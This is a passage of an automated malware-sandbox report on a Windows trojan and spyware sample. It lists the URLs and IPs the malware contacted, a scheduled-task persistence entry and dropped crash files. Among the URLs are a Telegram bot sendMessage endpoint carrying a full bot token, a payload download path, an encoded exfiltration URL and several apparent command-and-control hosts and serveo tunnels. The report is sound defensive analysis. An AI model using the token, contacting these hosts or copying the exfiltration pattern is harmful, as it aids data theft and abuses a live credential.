                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01B33000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D18E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://e2111f95f52ba8be6b2d3394e38b1722.serveo.net:6787//e2111f95f52ba8be6b2d3394e38b1722.serveo.netvkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://185.119.118.59:8080/hkLYW_uservkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://45.61.136.13:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • 2%, Virustotal, Browse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE74E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://api.telegram.orgvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8574000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://154.26.128.6:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • 0%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://212.6.44.53:8080vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • 1%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://185.217.98.121:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • 15%, Virustotal, Browse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://api.telegram.orgvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8574000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://contoso.com/Licensepowershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessagevkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7505000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://44.228.161.50:443vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • 2%, Virustotal, Browse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                http://104.248.208.221:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • 1%, Virustotal, Browse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://164.90.185.9:443vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • 9%, Virustotal, Browse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                http://www.w3.vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD78E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://18.228.80.130:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • 11%, Virustotal, Browse
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown
                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE74E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://contoso.com/powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://185.217.98.121:8080vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • 11%, Virustotal, Browse
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://193.142.58.127:80Pkvkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		low
                                                                                        https://e2111f95f52ba8be6b2d3394e38b1722.serveo.netvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://e483612b93e055308d0c85f365c474ee.serveo.netvkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icovkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://144.126.132.141:8080vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://pesterbdd.com/i?powershell.exe, 00000001.00000002.1717594364.000000000785F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          https://18.178.28.151:443vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://82.147.85.194/byte/jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          http://upx.sf.netAmcache.hve.41.drfalse
                                                                                            		high
                                                                                            http://127.0.0.1:6787/ing=novkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9D5000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD853B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://149.88.44.159:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://82.147.85.194jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002DAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net/vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B79934000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B798EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://185.217.98.121:443vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            		unknown
                                                                                            https://ac.ecosia.org/autocomplete?q=vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://116.202.101.219:8080vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              https://api.televkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://206.189.109.146:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              http://127.0.0.1:18772/handleOpenWSR?r=vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://support.mozilla.orgvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7577000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE757F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zipvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD853B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://185.119.118.59:8080/%68%6B%4C%59%57%5F%6A%6F%6E%65%73%40%34%36%38%33%32%35%5F%72%65%70%6F%72%vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://crl.vvkefq4cv.oil.exe, 0000000B.00000002.4115442750.000001B8A9D61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high

                                                                                                    World Map of Contacted IPs

                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs

                                                                                                    Public IPs

                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    82.147.85.194
                                                                                                    		unknownRussian Federation
                                                                                                    		31112SIBTEL-ASRUfalse
                                                                                                    208.95.112.1
                                                                                                    		ip-api.comUnited States
                                                                                                    		53334TUT-ASUSfalse
                                                                                                    149.154.167.220
                                                                                                    		api.telegram.orgUnited Kingdom
                                                                                                    		62041TELEGRAMRUfalse
                                                                                                    138.68.79.95
                                                                                                    		serveo.netUnited States
                                                                                                    		14061DIGITALOCEAN-ASNUSfalse
                                                                                                    185.119.118.59
                                                                                                    		unknownAustria
                                                                                                    		44133IPAX-ASATfalse

                                                                                                    Private

                                                                                                    IP
                                                                                                    127.0.0.1

                                                                                                    General Information

                                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                                    Analysis ID:1390172
                                                                                                    Start date and time:2024-02-10 16:16:06 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 11m 29s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:light
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:47
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:jqOHOuPMJP.exe
                                                                                                    renamed because original name is a hash value
                                                                                                    Original Sample Name:7e9a93c69aecfc2bbda9470fbd4556db.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@66/19@3/6
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 87.5%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 98%
                                                                                                    • Number of executed functions: 0
                                                                                                    • Number of non-executed functions: 0
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                    Warnings

                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                    • TCP Packets have been reduced to 100
                                                                                                    • Excluded IPs from analysis (whitelisted): 20.189.173.22
                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Execution Graph export aborted for target vkefq4cv.oil.exe, PID 7316 because it is empty
                                                                                                    • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                    Simulations

                                                                                                    Behavior and APIs

                                                                                                    TimeTypeDescription
                                                                                                    15:17:16Task SchedulerRun new task: vkefq4cv.oil path: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    16:16:59API Interceptor2x Sleep call for process: jqOHOuPMJP.exe modified
                                                                                                    16:16:59API Interceptor15x Sleep call for process: powershell.exe modified
                                                                                                    16:17:17API Interceptor4964965x Sleep call for process: vkefq4cv.oil.exe modified
                                                                                                    16:17:35API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                    Joe Sandbox View / Context

                                                                                                    IPs

                                                                                                    No context

                                                                                                    Domains

                                                                                                    No context

                                                                                                    ASNs

                                                                                                    No context

                                                                                                    JA3 Fingerprints

                                                                                                    No context

                                                                                                    Dropped Files

                                                                                                    No context

                                                                                                    Created / dropped Files

                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_vkefq4cv.oil.exe_8bda737a63465ab69884df6bd58af130501f7e94_ea868dc5_2dd495ae-2f75-472c-b3ff-2ce61eb255a3\Report.wer

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):1.3631329385084094
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fNJVulDnA0Z4V4LSaKUbJlVNe6lZF6zuiFtZ24lO8qU:1JViDbZ4V4LSaJbrWhzuiFtY4lO8qU
                                                                                                    MD5:8DF9BDA50BBE3450B40A752EFDA35970
                                                                                                    SHA1:9087F9B044B5643151B6E880FA1D4662544B872E
                                                                                                    SHA-256:B1554ABADA649C3F418FB4061ECDFA48ED84929AF06F3757DB7AA55203585DB6
                                                                                                    SHA-512:2D2622EE1C7D2AECDA109F88963444C341338281CD6C1384BDFC2ED2A704EBC74622A3EC5CA4416E0E1B830D0AAAC0F7988CED27D4B2A135D283E213354BF175
                                                                                                    Malicious:false
                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.2.0.5.1.8.4.2.7.5.6.8.9.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.2.0.5.1.8.4.3.7.1.0.0.1.6.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.d.d.4.9.5.a.e.-.2.f.7.5.-.4.7.2.c.-.b.3.f.f.-.2.c.e.6.1.e.b.2.5.5.a.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.5.b.e.8.d.c.3.-.4.6.e.4.-.4.8.7.7.-.b.8.8.e.-.e.8.e.a.c.4.f.4.b.5.1.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.v.k.e.f.q.4.c.v...o.i.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.a.b.9.b.8.4.c.f.0.b.e.0.9.9.b.2.6.b.5.d.8.b.d.8.e.f.a.c.0.2.9.1.7.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.8.8.-.0.0.0.1.-.0.0.1.4.-.1.1.e.6.-.4.8.3.b.3.4.5.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.6.a.d.d.9.e.2.6.2.e.9.1.3.a.e.8.a.e.d.4.2.5.1.a.8.a.0.0.5.3.3.0.0.0.0.0.0.0.0.!.0.0.0.0.5.b.4.8.d.3.2.a.c.a.1.f.7.7.0.5.c.0.3.e.2.b.d.

                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB81.tmp.dmp

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                    File Type:Mini DuMP crash report, 16 streams, Sat Feb 10 15:17:23 2024, 0x1205a4 type
                                                                                                    Category:dropped
                                                                                                    Size (bytes):744738
                                                                                                    Entropy (8bit):2.9709841894198212
                                                                                                    Encrypted:false
